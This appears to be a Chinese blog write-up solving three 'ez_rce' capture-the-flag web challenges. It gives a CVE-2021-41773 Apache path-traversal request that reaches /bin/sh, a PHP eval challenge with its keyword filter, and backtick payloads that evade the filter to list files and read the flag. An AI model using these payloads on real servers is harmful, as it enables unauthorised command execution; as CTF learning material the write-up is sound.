[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce
第一题:[SWPUCTF 2022 新生赛]ez_rce已解决
1、看一下,啥也没有,找一下robots.txt
2、访问一下,/NSS/index.php
3、thinkphp,直接找个工具嗦吧,咱也不会
4、粘过来直接用,后面写命令,这题很烦,我在/flag找了半天,没找到
5、后来发现了nss,又套娃,整的我这个菜鸡都怀疑人生了,太菜了!
第二题:[NSSRound#4 SWPU]ez_rce
题目标签:CVE-2021-41773,版本漏洞
大佬详细解释:CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现_wavesky111的博客-CSDN博客_cve-2021-41773
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
burp中再写入命令,在flag_is_here中藏的很深,所以过滤一下
grep -r "NSS" /flag_is_here
以递归的方式查找“/flag_is_here”下包含“NSS”的文件
grep详细用法:Linux grep 命令 | 菜鸟教程
第三题、[UUCTF 2022 新生赛]ez_rce
居然都不输入参数,可恶!!!!!!!!!<?php
## 放弃把,小伙子,你真的不会RCE,何必在此纠结呢????????????
if(isset($_GET['code'])){$code=$_GET['code'];if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){echo '看看你输入的参数!!!不叫样子!!';echo '<br>';eval($code);}else{die("你想干什么?????????");}
}
else{echo "居然都不输入参数,可恶!!!!!!!!!";show_source(__FILE__);
}
过滤了很多命令函数,没有过滤反引号
?code=printf(`l\s /`);
再查看flag就可以了
?code=printf(`c\at /fffffffffflagafag`);
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce相关推荐
- 2022年第十一届认证杯数学中国数学建模国际赛小美赛:D题野生动物贸易是否应该长期禁止建模 38页一等奖论文及代码
相关链接 (1)2022年第十一届认证杯数学中国数学建模国际赛小美赛:D题野生动物贸易是否应该长期禁止建模方案及代码实现 (2)一等奖论文下载 1 题目 野生动物市场被怀疑是当前疫情和2002年SAR ...
- 2022美赛E题(森林的碳封存)——赛题解读解题思路
2022美赛E题(森林的碳封存)--赛题解读&解题思路 2023美赛题分析已经出了! 赛题目的 一. 预测碳吸收模型 ==1.1. 问题分析==: 1.2. 查资料:碳排放怎么估计&碳 ...
- 【蓝桥杯Web】2022年第十三届蓝桥杯Web大学组国赛真题解析
前言 省赛真题解析见: 2022年第十三届蓝桥杯Web大学组省赛真题解析(完整版) 2022年第十三届蓝桥杯Web大学组省赛真题解析(精华版) 更多蓝桥杯题解请查阅专栏:蓝桥杯 之前写省赛解析时篇幅过 ...
- 2022年第十一届认证杯数学中国数学建模国际赛小美赛:C 题 对人类活动进行分类 建模方案及代码实现
2022年第十一届认证杯数学中国数学建模国际赛小美赛:C 题 对人类活动进行分类 建模方案及代码实现 更新进展 (1)2022-12-3 10:00 发布合并后的数据,完整的python代码.LSTM ...
- 2022年小美赛思路/2022年第十一届“认证杯”数学中国数学建模国际赛思路/2022年认证杯思路
思路获取见文末 为了感谢支持我们的小伙伴,本次思路将给大家送福利! 第十一届"认证杯"数学中国数学建模国际赛将于2022年12月02日上午8时-2022年12月06日上午8时举行, ...
- 2022年第四届人工智能与机器学习国际会议(FAIML 2022)
2022年第四届人工智能与机器学习国际会议(FAIML 2022) 重要信息 会议网址:www.faiml.org 会议时间:2022年7月19-21日 召开地点:中国杭州 截稿时间:2022年6 ...
- 【JPCS 独立出版】2022年机器人与人工智能国际会议(JCRAI 2022)
2022年机器人与人工智能国际会议(JCRAI 2022) 重要信息 会议网址:www.jcrai.org 会议时间:2022年10月14-16日 召开地点:中国成都 截稿时间:2022年8月30 ...
- 2022一建改革加考英语和计算机,一级建造师2022年会改革吗,会增加考试科目吗...
目前没有官方发布消息明确2022年一级建造师考试会增加考试科目,目前一级建造师考试共设置四个考试科目,考试已经具备一定的难度,即使是改革应该也不会增加考试科目. 一级建造师考哪些科目 一级建造师考试有 ...
- 2022年第四届计算机视觉与模式识别国际会议(CCVPR 2022)
2022年第四届计算机视觉与模式识别国际会议(CCVPR 2022) 重要信息 会议网址:www.ccvpr.org 会议时间:2022年12月9-11日 召开地点:广州 截稿时间:2022年10 ...
最新文章
- Ubuntu 16.04 安装 caffe
- 二十二、statsmodels库的使用
- 不是keys,记一次因 redis 使用不当导致应用卡死 的过程
- tcga癌症亚型获取_亚型多态性应用于元组的危险
- linux网路编程之多进程并发服务器
- ASP.NET MVC Music Store教程(2):控制器
- scriptalert(1)/script
- XSS-Payloads集合
- Kotlin入门(30)多线程交互
- 在linux中挂载磁盘ext3和ext4之间的区别
- 捷信达酒店管理系统密码修改SQL语句
- 华为手表广告营销案例和广告策划案例PPT模板
- 【web前端特效源码】使用HTML5+CSS3+JavaScript制作一个会动的扔垃圾到垃圾桶动画效果~适合初学者~超简单~ |前端开发 it入门
- HAA2018A_音频功放规格书_V1.2
- Vs code PIO一直loading
- c++ 函数重载(简单易懂)
- html数独游戏制作,使用HTML5和ES6(JS)实现的在线数独游戏生成器和解答
- 关于JAVAFX的鼠标单击事件案例
- idea报错 No valid Maven installation found.maven不能用
- IM即时通讯综合消息系统的架构